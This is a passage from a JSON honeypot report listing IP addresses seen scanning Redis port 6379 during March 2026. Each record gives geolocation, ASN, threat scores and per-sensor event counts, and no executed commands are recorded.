        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T14:09:52+00:00",
        "last_seen_30d": "2026-03-07T05:36:33.875000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "36.135.17.52": {
      "attack_count": 18,
      "first_seen": "2026-03-12T16:05:27.000Z",
      "last_seen": "2026-03-23T19:09:46.703Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134810,
      "as_org": "China Mobile Group JiLin communications corporation",
      "threat_score": 22.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-12T16:05:28+00:00",
        "last_seen_30d": "2026-03-23T19:09:46.703000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "36.170.62.63": {
      "attack_count": 18,
      "first_seen": "2026-03-10T14:32:44.000Z",
      "last_seen": "2026-03-12T09:07:16.248Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 8.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T14:32:44+00:00",
        "last_seen_30d": "2026-03-12T09:07:16.248000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "47.92.97.77": {
      "attack_count": 18,
      "first_seen": "2026-03-14T11:14:31.000Z",
      "last_seen": "2026-03-30T09:07:08.760Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 34.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T11:14:31+00:00",
        "last_seen_30d": "2026-03-30T09:07:08.760000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "52.226.218.170": {
      "attack_count": 18,
      "first_seen": "2026-03-07T13:21:37.000Z",
      "last_seen": "2026-03-07T16:15:39.650Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T13:21:37+00:00",
        "last_seen_30d": "2026-03-07T16:15:39.650000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "185.55.240.152": {
      "attack_count": 17,
      "first_seen": "2026-03-02T20:46:16.000Z",
      "last_seen": "2026-03-06T03:13:34.206Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 199912,
      "as_org": "Layer7 Networks GmbH",
      "threat_score": 13.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 4.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 58090,
        "days_active_30d": 5,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T19:56:47+00:00",
        "last_seen_30d": "2026-03-06T03:27:37.309000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 40888,
        "Honeytrap": 17192,
        "Cowrie": 4,
        "Redishoneypot": 4,
        "Miniprint": 2
      }
    },
    "71.6.134.230": {
      "attack_count": 17,
      "first_seen": "2026-03-05T09:28:33.000Z",
      "last_seen": "2026-03-05T09:50:15.795Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 83.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.3,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 342,
        "days_active_30d": 27,
        "ports_targeted_30d": 42,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T05:18:42+00:00",
        "last_seen_30d": "2026-03-28T01:22:27.024000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 247,
        "Honeytrap": 69,
        "Cowrie": 13,
        "Redishoneypot": 6,
        "H0neytr4p": 4,
        "Tanner": 2,
        "Sentrypeer": 1
      }
    },
    "192.46.221.9": {
      "attack_count": 16,
      "first_seen": "2026-03-19T02:23:57.000Z",
      "last_seen": "2026-03-19T07:17:41.551Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 45.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 5753,
        "days_active_30d": 1,
        "ports_targeted_30d": 1509,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-19T02:23:42+00:00",
        "last_seen_30d": "2026-03-19T07:27:00.898000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3045,
        "Honeytrap": 2646,
        "Dionaea": 18,
        "ConPot": 16,
        "Cowrie": 8,
        "Miniprint": 6,
        "Adbhoney": 4,
        "Dicompot": 4,
        "Redishoneypot": 4,
        "Sentrypeer": 2
      }
    },
    "20.8.140.238": {
      "attack_count": 16,
      "first_seen": "2026-03-07T02:22:08.000Z",
      "last_seen": "2026-03-09T00:27:35.841Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 5.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T02:23:18.303000+00:00",
        "last_seen_30d": "2026-03-09T00:27:35.841000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "140.238.153.39": {
      "attack_count": 15,
      "first_seen": "2026-03-05T12:36:14.000Z",
      "last_seen": "2026-03-24T14:03:01.990Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 32.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.1,
        "persistence": 16.7,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 20,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T12:37:15.837000+00:00",
        "last_seen_30d": "2026-03-24T14:03:01.990000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 2
      }
    },
    "20.55.2.194": {
      "attack_count": 15,
      "first_seen": "2026-03-17T13:10:37.000Z",
      "last_seen": "2026-03-17T13:12:23.736Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 33.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 7.5,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 9,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-17T13:11:19+00:00",
        "last_seen_30d": "2026-03-25T06:57:40.441000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "20.81.46.143": {
      "attack_count": 15,
      "first_seen": "2026-03-18T18:37:35.000Z",
      "last_seen": "2026-03-18T18:40:29.090Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 63.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 11.8,
        "persistence": 22.5,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 27,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-05T11:24:06+00:00",
        "last_seen_30d": "2026-03-31T04:14:35.609000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "209.14.6.22": {
      "attack_count": 15,
      "first_seen": "2026-03-07T18:34:35.000Z",
      "last_seen": "2026-03-07T18:35:44.171Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "S\u00e3o Jos\u00e9 do Rio Preto",
      "asn": 272764,
      "as_org": "DaLink Telecom LTDA",
      "threat_score": 22.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 3.3,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 5472,
        "days_active_30d": 4,
        "ports_targeted_30d": 549,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-07T17:10:49+00:00",
        "last_seen_30d": "2026-03-10T20:51:04.707000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Cowrie": 2578,
        "Suricata": 2293,
        "Honeytrap": 598,
        "Redishoneypot": 3
      }
    },
    "47.98.205.94": {
      "attack_count": 15,
      "first_seen": "2026-03-18T11:21:37.000Z",
      "last_seen": "2026-03-23T19:27:43.628Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 17.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T11:22:42.056000+00:00",
        "last_seen_30d": "2026-03-23T19:27:43.628000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "144.123.77.157": {
      "attack_count": 13,
      "first_seen": "2026-03-31T06:11:27.000Z",
      "last_seen": "2026-03-31T06:12:30.861Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 49.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.0,
        "persistence": 25,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 30,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T01:48:03.782000+00:00",
        "last_seen_30d": "2026-03-31T06:12:30.861000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7,
        "Redishoneypot": 3
      }
    },
    "91.230.168.164": {
      "attack_count": 13,
      "first_seen": "2026-03-14T05:50:48.000Z",
      "last_seen": "2026-03-14T05:52:06.030Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 79.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 84,
        "days_active_30d": 30,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T19:46:30+00:00",
        "last_seen_30d": "2026-03-31T14:01:35.125000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 52,
        "Honeytrap": 29,
        "Redishoneypot": 3
      }
    },
    "91.230.168.97": {
      "attack_count": 13,
      "first_seen": "2026-03-23T16:44:38.000Z",
      "last_seen": "2026-03-23T16:45:54.841Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 42.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 17.5,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 21,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T17:56:39+00:00",
        "last_seen_30d": "2026-03-23T16:45:54.841000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 5,
        "Redishoneypot": 3
      }
    },
    "193.163.125.91": {
      "attack_count": 12,
      "first_seen": "2026-03-02T00:07:03.000Z",
      "last_seen": "2026-03-08T00:11:18.992Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 16.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.8,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 48,
        "days_active_30d": 10,
        "ports_targeted_30d": 45,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:08:03.788000+00:00",
        "last_seen_30d": "2026-03-11T13:42:58.423000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 48
      }
    },
    "66.132.172.210": {
      "attack_count": 12,
      "first_seen": "2026-03-22T18:30:47.000Z",
      "last_seen": "2026-03-22T18:31:48.976Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 69.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.8,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 96,
        "days_active_30d": 12,
        "ports_targeted_30d": 27,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-20T22:16:46+00:00",
        "last_seen_30d": "2026-03-31T00:11:54.485000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 48,
        "Honeytrap": 41,
        "Redishoneypot": 6,
        "ConPot": 1
      }
    },
    "185.242.226.44": {
      "attack_count": 11,
      "first_seen": "2026-03-17T23:15:17.000Z",
      "last_seen": "2026-03-18T19:10:00.941Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1359,
        "days_active_30d": 25,
        "ports_targeted_30d": 525,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:05:02.600000+00:00",
        "last_seen_30d": "2026-03-26T01:27:06.890000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1359
      }
    },
    "47.111.178.32": {
      "attack_count": 11,
      "first_seen": "2026-03-20T12:09:58.000Z",
      "last_seen": "2026-03-20T12:11:08.803Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 11.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T12:09:59+00:00",
        "last_seen_30d": "2026-03-20T12:11:08.803000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "47.121.142.102": {
      "attack_count": 11,
      "first_seen": "2026-03-05T09:31:23.000Z",
      "last_seen": "2026-03-25T01:05:47.835Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 22.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 3.0,
        "persistence": 17.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 21,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T09:32:31.817000+00:00",
        "last_seen_30d": "2026-03-25T01:05:47.835000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "100.49.117.77": {
      "attack_count": 10,
      "first_seen": "2026-03-04T04:05:58.000Z",
      "last_seen": "2026-03-19T02:34:14.980Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 431,
        "days_active_30d": 30,
        "ports_targeted_30d": 179,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:02:30.373000+00:00",
        "last_seen_30d": "2026-03-31T20:21:40.965000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 431
      }
    },
    "113.105.90.148": {
      "attack_count": 10,
      "first_seen": "2026-03-26T04:11:44.000Z",
      "last_seen": "2026-03-26T04:21:51.027Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 44.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 9.0,
        "persistence": 20.8,
        "diversity": 6,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 25,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T21:44:34.807000+00:00",
        "last_seen_30d": "2026-03-30T14:47:06.627000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5,
        "Redishoneypot": 3
      }
    },
    "122.96.28.59": {
      "attack_count": 10,
      "first_seen": "2026-03-18T03:23:57.000Z",
      "last_seen": "2026-03-18T03:25:05.367Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Wuxi",
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 11.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-18T03:23:57+00:00",
        "last_seen_30d": "2026-03-18T03:25:05.367000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 4,
        "Suricata": 1
      }
    },
    "196.70.254.249": {
      "attack_count": 10,
      "first_seen": "2026-03-04T03:37:09.000Z",
      "last_seen": "2026-03-10T05:50:39.990Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Morocco",
      "country_code": "MA",
      "city": "T\u00e9touan",
      "asn": 6713,
      "as_org": "Itissalat Al-MAGHRIB",
      "threat_score": 4.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T03:38:13.167000+00:00",
        "last_seen_30d": "2026-03-10T05:50:39.990000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "91.219.237.11": {
      "attack_count": 10,
      "first_seen": "2026-03-31T17:22:47.000Z",
      "last_seen": "2026-03-31T17:23:49.740Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hungary",
      "country_code": "HU",
      "city": "Budapest",
      "asn": 56322,
      "as_org": "ServerAstra Kft.",
      "threat_score": 19.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T17:22:47+00:00",
        "last_seen_30d": "2026-03-31T17:23:49.740000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 4,
        "Suricata": 1
      }
    },
    "147.185.132.165": {
      "attack_count": 9,
      "first_seen": "2026-03-14T01:53:59.000Z",
      "last_seen": "2026-03-14T01:55:35.493Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 87.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.9,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 124,
        "days_active_30d": 29,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T19:03:14.418000+00:00",
        "last_seen_30d": "2026-03-30T12:14:14.492000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 80,
        "Honeytrap": 33,
        "Cowrie": 4,
        "Redishoneypot": 3,
        "Dionaea": 2,
        "Honeyaml": 1,
        "Sentrypeer": 1
      }
    },
    "152.53.171.92": {
      "attack_count": 9,
      "first_seen": "2026-03-05T08:37:23.000Z",
      "last_seen": "2026-03-05T08:38:26.997Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Manassas",
      "asn": 214996,
      "as_org": "netcup GmbH",
      "threat_score": 2.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T08:37:23+00:00",
        "last_seen_30d": "2026-03-05T08:38:26.997000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "198.235.24.181": {
      "attack_count": 9,
      "first_seen": "2026-03-29T09:38:39.000Z",
      "last_seen": "2026-03-29T09:40:13.643Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 86.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.6,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 116,
        "days_active_30d": 29,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T21:54:21+00:00",
        "last_seen_30d": "2026-03-30T05:59:39.010000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 78,
        "Honeytrap": 31,
        "Redishoneypot": 3,
        "Dionaea": 2,
        "Honeyaml": 1,
        "Tanner": 1
      }
    },
    "20.121.80.160": {
      "attack_count": 9,
      "first_seen": "2026-03-04T11:02:45.000Z",
      "last_seen": "2026-03-04T11:03:46.529Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T11:02:45+00:00",
        "last_seen_30d": "2026-03-04T11:03:46.529000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
